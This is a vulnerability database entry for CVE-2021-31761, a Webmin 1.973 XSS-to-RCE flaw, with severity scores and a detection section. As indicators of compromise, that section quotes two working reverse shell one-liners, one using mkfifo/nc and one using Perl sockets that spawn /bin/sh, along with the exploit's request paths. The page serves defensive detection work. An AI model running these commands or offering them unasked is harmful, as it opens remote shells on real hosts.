cbcvebase.
CVE-2021-31761
published 2021-04-25

CVE-2021-31761: Webmin 1.973 is affected by reflected Cross Site Scripting (XSS) to achieve Remote Command Execution through Webmin's running process feature.

PriorityP262critical9.6CVSS 3.1
AVNACLPRNUIRSCCHIHAH
EXPLOIT
EPSS
33.57%
98.2th percentile
Webmin 1.973 is affected by reflected Cross Site Scripting (XSS) to achieve Remote Command Execution through Webmin's running process feature.

Affected

1 ranges
VendorProductVersion rangeFixed in
webminwebmin

Detection & IOCsextracted from sources · hover to see the quote

path/tunnel/link.cgi/
pathrun.cgi
commandmkfifo /tmp/<rand>; nc <ip> <port> 0/tmp/<rand> 2>&1; rm /tmp/<rand>
commandperl -e 'use Socket;$i="<ip>";$p=<port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
  • Monitor HTTP requests to /tunnel/link.cgi/ containing URL-encoded HTML form payloads with document.forms[0].submit() — this is the CSRF delivery vector used to trigger RCE via the running process feature.
  • Alert on Webmin process spawning mkfifo, nc, python, perl, ruby, or php reverse shell one-liners as child processes — these are the five payload types generated by the exploit.
  • Detect creation of randomly-named named pipes (mkfifo) under /tmp/ followed immediately by nc execution — characteristic of the Bash reverse shell payload in this exploit.
  • The exploit delivers its CSRF payload as a URL-encoded string appended directly to /tunnel/link.cgi/; inspect GET/POST requests to this path for embedded HTML form tags and JavaScript history.pushState calls.
  • The attack targets Webmin's 'running process' feature to achieve RCE; monitor for unexpected command execution originating from the Webmin process (e.g., miniserv.pl spawning shells).
  • ·The exploit requires a Webmin administrator to click the crafted CSRF link; the attack chain is XSS → CSRF → RCE and will not succeed against non-admin sessions.
  • ·The exploit is confirmed against Webmin 1.973 but the author notes it was tested on 'All versions', so detection rules should not be scoped exclusively to version 1.973.

CVSS provenance

nvdv3.19.6CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.